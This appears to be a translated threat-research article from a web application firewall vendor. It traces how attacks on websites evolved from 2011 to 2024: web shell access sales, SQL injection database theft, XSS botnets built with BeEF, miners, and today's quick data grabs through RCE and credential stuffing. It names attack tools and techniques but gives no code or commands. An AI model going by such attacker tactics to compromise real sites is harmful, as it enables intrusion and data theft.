what has changed since 2011

The BI.ZONE WAF Cyber ​​Threat Analytics and Research Department studied the statistics of attacks on web applications that are protected by our solution. We compared this information with the results of an analysis of shadow resources, which our specialists have been monitoring since 2011. In this article we will tell you how the methods of attackers have developed.

How web resources were hacked in past years

Between 2011 and 2018, attackers sold access to hacked web applications on shadow forums. In 90% of cases, content management systems (CMS), CRM systems, as well as web admin servers and network equipment “sticking out” online came under attack.

To search for targets, the attacker used a list of registered domain names over the past year. It is quite simple to prepare such a list using open data, and then using crawler utilities like CMS-Finder you can detect the URI of the web admin panel, the template engines used, versions of web interpreters, and so on.

As a result, the attacker received a list of targeted vulnerable web resources. At the next stage, this list was processed using harvester utilities, which automatically selected logins and passwords for admin panels and uploaded web shells (often WSO) to web application servers. If versions of applications or web interpreters with known vulnerabilities were discovered, basic exploits could also be used.

The attackers also used fuzzer utilities: WebCruiser, SQLmap, XSSer, RouterSploit, and so on. They made it possible to send hundreds of payloads with different web attacks to application servers – maybe something would go wrong.

As a result, the attacker received permanent remote access to the compromised resource. The method is fast enough, thanks to which the attacker could launch utilities in several threads, from different devices and from different networks. Thus, in one day it was possible to create 30–200 web shells on hacked sites and servers.

How did the attackers manage the access they received?

To list all the ways in which such access can be misused would require several separate articles. Let's look at the most popular scenarios from 2011 to 2018:

  1. Getting into the infrastructure, the attacker first tried to understand where he was: he looked at configuration files, available rights, data about the system and network interactions. Corporate networks were mostly flat, without segmentation; servers were located in the local infrastructure. Therefore, an attacker could scan the infrastructure from the local network and use some popular exploit to carry out an attack via SMB or RDP. As a result, he essentially created a kind of map along which he moved further. If the compromised server was hosted on a company's local network, the attacker would attempt to scan segments of the network to escalate the attack to other devices and applications or attempt to exit the container/virtual machine. If successful, he could develop a presence in the infrastructure, gain a foothold in it and, for example, create accounts with administrator rights.

  2. One of the most common cases is database theft. Fuzzer utilities are able to find SQL injection capabilities on authentication pages, search forms, etc.: union-based, boolean-based, time-based, or even stacked queries. An attacker, even without special knowledge of SQL syntax, could detect a vulnerability and automatically download information for subsequent sale. In those days, many companies stored passwords in clear text directly in databases; as a result, attackers could obtain the entire array of credentials, emails, and nicknames, which could then be used for credential stuffing or brute force attacks.

  3. When a stored XSS vulnerability was discovered, it became possible to carry out attacks on users. For example, attackers actively used the BeEF framework, a legitimate pentesting tool that, in the wrong hands, allowed them to inject a malicious JavaScript library into a compromised page. After this, visitors visiting the site gave the attackers access to their data. True, this technique only fully worked against vulnerable versions of the browser, and when closing a tab with a hacked site, the connection was interrupted.

    This is exactly how the SPRUT group acted in 2015. The attackers wrote their own crawler with a fuzzer that searched for and tested web applications for stored XSS vulnerabilities or RCE capabilities at the site file editing level. BeEF was used to generate a JavaScript payload that SPRUT injected into the web application pages.

    To prevent the attack from being interrupted when the victim closed the page, the attackers wrote a malicious plugin for different browsers, which showed a notification asking the user to install the addon. If users did not understand the logic of the attack and simply clicked the classic “OK”, the malicious JS library remained in the browser’s memory, allowing attackers to maintain the connection.

    In this way, SPRUT was able to infect more than 100,000 devices and combine them into a web botnet to steal and sell user data.

  4. Another option for spreading malware is to spoof objects of compromised web applications so that when accessing them, the victim receives a malicious file on their device. This is exactly how the well-known Zeus botnet and the Carberp banking trojan with a bootkit on board worked.

  5. An attacker could use ransomware to encrypt sensitive web application data and demand a ransom from the owner. In addition, he could not deliver the ransomware himself, but again put up access to vulnerable infrastructure for sale.

  6. Access to the server made it possible to embed a miner script into web pages so that visitors could mine cryptocurrency for the attacker. In some cases, the miner was able to run on the main web application server.

  7. If a cybercriminal managed to create several web shells, they could be combined into a botnet using utilities like Web Shell Manager. Subsequently, such botnets were used to provide DDoS services or were sold on shadow resources, where they were purchased, for example, by the owners of larger botnets that needed replenishment.

  8. Hacktivists who don’t care about money often used the access they gained to deface a hacked resource (replace the original content with an ad, message, picture, or something similar). Such attackers were more likely to pursue their reputation and try to imitate movie hackers.

What has changed in recent years

In 2024, more organizations and individual website owners are hosting web applications with hosting providers. Even if an attacker penetrates the web application, he will not be able to transfer the attack to the internal infrastructure.

In addition, the architecture of web applications has changed noticeably. Firstly, it has transformed from monolithic to microservice, and compromising one module does not always lead to a compromise of the entire system. Secondly, request routing, which was previously carried out on the basis of files, is now organized using frameworks. Finally, thirdly, companies that do not need complex web resources are now using SPA business cards (single page application). Such sites don’t really have a backend—there’s nothing for attackers to break.

Now attackers are less likely to find a vulnerable server with an outdated CMS or an open port. Scanning attempts run into WAFs and isolated segments; getting into the internal infrastructure is incomparably more difficult than before. As a result, the previously existing model – hack a host, gain a foothold and sell access – has lost its relevance.

What are the attackers' goals now?

In contrast to the attackers of yesteryear, today's cybercriminals strive to leave a compromised server as quickly as possible. Their behavior model is “hacked, uploaded data, left.” In rare cases, groups try to break through from the application further into the infrastructure and gain a foothold. As mentioned above, most of the current web systems are hosted in isolated segments and on external hosting, so no one knows whether there is any practical sense in trying to break out of these segments.

That is why hackers try to quickly download data and hide, without the risk of being detected and losing access ahead of time. Next, the stolen data is put up for sale or becomes publicly available if it is related to hacktivism or politics. For example, databases with password hashes are sold on shadow forums – passwords can be hacked and subsequently used for credential stuffing. This is a very popular attack technique because users often use the same passwords on different resources. Once one site leaks, the accounts of other sites are at risk.

In addition to data theft, a hacked website can be used as hosting. Malware is placed on compromised resources to be later used, for example, as part of phishing campaigns. It is easier to hide such activity from cybersecurity systems: it is one thing when a user downloads an unknown file from a known domain, and quite another when he accesses some random host.

What methods are used in modern attacks?

As a result, as we see from the statistics of cyber attacks on BI.ZONE WAF clients, more than half of the cases of malicious actions against web resources are associated with attempts to implement a third-party code execution vulnerability (remote code/command execution, RCE). The reason for this popularity is that RCE allows you to quickly gain remote access to the server and establish full control over it with the possibility of almost any attack.

According to data from our own honeypots, such web attack techniques as command injection, server-side template injection (SSTI), stacked queries SQL injections, remote file inclusion (RFI), local file inclusion (LFI), shell are now popular among attackers file uploading, code injection, XML external entity (XXE), insecure deserialization, cross-site scripting (XSS). All of them, except the last one, can pose a threat to RCE. Finally, attempts to use exploits against well-known CVEs remain relevant.

The popularity of these methods is directly related to the fact that many powerful EASM (external attack surface management) tools have become publicly available for free. They are designed for continuous penetration testing and essentially perform the tasks of a June pentester, allowing you to fuzz and scan web applications and network ports, identify vulnerabilities and apply exploits. The most popular utilities are Acunetix, NetSparker, Nessus, Nuclei, NMAP (with NSE scripts), Metasploit Pro, Exploit Pack Premium, Burp Suite Enterprice.

Now, to successfully carry out attacks, an attacker just needs to “feed” the tool a list of attacked hosts and calmly go drink tea while the utility itself identifies and applies vulnerabilities. Many major cyber attacks of recent times—we won’t specify which ones exactly—began with banal credential stuffing or brute force.

Conclusion

In 2024, 87% of cyber attacks are related not to unauthorized access, but to information: databases, confidential files, authorization data (email addresses, logins, passwords, full name), materials from corporate and government systems.

Even if some techniques for attacking web applications remain relevant, the goals of attackers have radically changed. Our study of activity on shadow forums shows that only 2 out of 10 proposals are related to the sale of access through web shells. Others are trying to make money on data that can later be used for phishing, credential stuffing, brute force and similar attacks. And selling remote access for long-term fixation on a web application server has lost its meaning.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *